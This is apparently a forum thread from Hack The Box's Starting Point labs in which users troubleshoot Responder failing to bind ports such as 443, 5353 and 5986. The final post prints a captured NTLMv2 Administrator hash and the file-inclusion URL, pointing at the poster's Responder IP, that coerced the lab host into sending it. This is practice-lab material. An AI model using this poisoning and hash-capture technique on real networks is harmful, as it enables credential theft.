Responder Tool issue - Starting Point

MajorTheShiba · May 1, 2022, 7:00pm

Anyone faced similar issues with Responder tool when doing the labs? Not able to listen to any traffic using port 5985… Any suggestion on what i can do? Thanks in advance!

[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.

xtal · May 2, 2022, 5:44am

First step: Check if any other process (server or client) uses the ports.

ss --udp --tcp --listen --process

Second: For using port 443 (a port or the first 1024) you need root permission. So typical a sudo or a su command is needed.

Teknogrot · May 6, 2022, 4:30pm

I’m having the same issue, but only for ports 443 and 5986. It’s being run with sudo and your suggestion along with

sudo netstat -antp

hasn’t shown anything bound to either port.

xtal · May 9, 2022, 8:46am

On my local box with Parrot OS 5.0 the responder 3.0.6.0 is installed by default.

As root I can start the Responder Python script:

$ responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

... cut some lines here ...

[!] Error starting TCP server on port 3389, check permissions or other servers running.

[+] Listening for events...

The server at port 3389 could not be started by the responder script.

I checked it:

$ ss --tcp --udp --listen --numeric --process
Netid    State      Recv-Q     Send-Q                              Local Address:Port          Peer Address:Port    Process                                                                                                             
udp      UNCONN     0          0                                         0.0.0.0:53294              0.0.0.0:*        users:(("openvpn",pid=2759,fd=3))                                                                                  
udp      UNCONN     0          0              [fe80::2afa:9bca:c24f:4f39]%enp1s0:546                   [::]:*        users:(("NetworkManager",pid=454,fd=24))                                                                           
tcp      LISTEN     0          2                                           [::1]:3350                  [::]:*        users:(("xrdp-sesman",pid=712,fd=7))                                                                               
tcp      LISTEN     0          2                                               *:3389                     *:*        users:(("xrdp",pid=729,fd=11))

Ok. The port 3389 is already used by the xrd server. So the responder can not use this port.
The openvpn process opens the udp port if I am connect to the HTB lab via openvpn. This port is at least open if I am connected from my local box to HTB.

On my local Parrot OS box the responder in the default installation works plausible.

Teknogrot · May 9, 2022, 10:12am

When playing around I think I solved it for myself at least. I had installed it manually on Kali and when heading to install directory and calling

sudo python3 responder.py -I tun0

it fails, but when I’m fumbling around I found the default install that I was sure existed already before heading to github and simply calling

sudo responder -I tun0

works fine.

Hopefully that’ll help the OP.

kateridzhe · February 12, 2023, 2:12pm

You have to turn off the HTTP server in Responder.conf and run the Responder. The answer is shown in this video starting from minute 8.

Po1s1n · August 15, 2023, 12:07am

For those on mac, if the only two ports giving errors are 5355 and 5353 then you can disregard these ports. These ports are used for Bonjour, Shareplay, etc and did not stop me from grabbing the hash statement from the website.

Side note: statement to get into Responder looks a tad different than those using Linux and Windows:

sudo python3 Responder.py -i {IP address of StartingPoint VPN}

gh0sted5tranger · September 14, 2023, 12:40pm

I am on Kali-Linux and have the same problem with port 5355 and 5353. How is it possible to disable/fix this issue. I am using sudo and the ports are not blocked by other programs

Po1s1n · September 15, 2023, 12:05am

What are the statements you used?

guard-cyber · December 30, 2023, 4:25pm

I face same error for port 443 and 5986 however . Even then I got the hash -[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.198.114
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:d34c4a93c7d69f80:EC6FE89AF6E6DB424ED02AABAB541464:010100000000000000216223103BDA016B4659E75FE781B000000000020008004A00360054004A0001001E00570049004E002D004C00520053005600380039005400310036004B004B0004003400570049004E002D004C00520053005600380039005400310036004B004B002E004A00360054004A002E004C004F00430041004C00030014004A00360054004A002E004C004F00430041004C00050014004A00360054004A002E004C004F00430041004C000700080000216223103BDA010600040002000000080030003000000000000000010000000020000078834C01C49616C0FE27D604084236CC194C585BE58D152BEF05A7478A8EE5A40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100330031000000000000000000
I only set the responder IP correctly here- http://unika.htb/?page=//10.10.16.131/somefile